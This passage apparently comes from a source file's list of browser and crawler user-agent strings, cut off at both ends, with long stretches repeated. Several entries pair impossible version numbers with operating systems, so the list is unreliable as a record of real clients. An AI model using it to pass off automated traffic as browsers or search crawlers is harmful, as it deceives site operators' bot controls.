rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) 